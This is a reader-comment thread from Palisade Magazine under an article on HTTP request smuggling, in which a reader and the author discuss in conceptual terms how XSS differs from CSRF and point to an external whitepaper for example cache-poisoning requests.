Palisade Magazine
 

Discuss: Identifying HTTP Request Smuggling attacks

by Siddharth Anbalahan
Discussion is open — there are 3 reader comments. Add yours.
1. Arvind | 04 Nov 2006 2:53 PM

First of all...Nice read !!

I have a couple of questions though:

1.XSS/XST mentions that the user needs to click on the link through his Email so that the malicious request is sent to the attacker's server. This results in the cookie information (session-cookie??) being sent to the attacker. Then the attacker can login to the user's account using the recently obtained cookie information.Right??

3.Cross-site request forgery also mentions that a session cookie is sent back to the server and the user needs to be logged in to his Netbanking session. This sounds like something similar to XSS.

Obviously there is a difference...but I'm not able to catch it. Is CSRF just a variation of XSS or is there some little detail I've missed?

Secondly , apart from the article linked to "HTTP Request smuggling attacks" is there a quick example of a dummy "malicious attack string" you can give a reference to which an attacker would send to poison the web proxy server's cache. I dont want a real life string...just a possible "attack string".

Cheers
Arvind

2. Balaji | 13 Nov 2006 12:21 PM

Arvind,

First of all... Thanks for your appreciation.

Let me answer your queries.

(1) As you said, while the user needs to click on the link in the malicious email, the request is not actually sent to the attacker's server but the target website vulnerable to XSS. The response from the website is what leads to the script execution that sends the session-cookie information to the attacker.

(2) As for CSRF, no information is actually sent to the attacker. Instead the attacker sends an email that seem to have a link to some other website. When the user clicks on the link, the request is sent to the target website and due to the browser feature, the cookie corresponding to the website is automatically included in the request. This enables an attacker to directly execute a command in the form of a request without accessing the application directly.

So primarily, in XSS, the attacker attempts to obtain the session cookie but in CSRF, the attacker attempts to execute a request at the target application.

To learn more about CSRF, you can refer to our article on Session Riding from the August 2006 issue at http://palisade.plynt.com/issues/2006Aug/session-riding/

(3) The example request available in the whitepaper 'HTTP Request Smuggling' published by Watchfire gives a clear idea about what kind of an attack string can be used to poison a web proxy server's cache. The paper is available at http://www.watchfire.com/resources/HTTP-Request-Smuggling.pdf

Hope i have cleared your doubts.

Thanks,
Balaji.V

3. Arvind | 14 Nov 2006 1:26 PM

Thanks Balaji .. that clarified it somewhat. Will check out the links later to clarify the matter further.

Appreciate the detailed response.

Cheers
Arvind

Post Your Comment








Please keep your comments on topic. Fields marked with * are required. We reserve the right to remove any comments deemed inappropriate.


*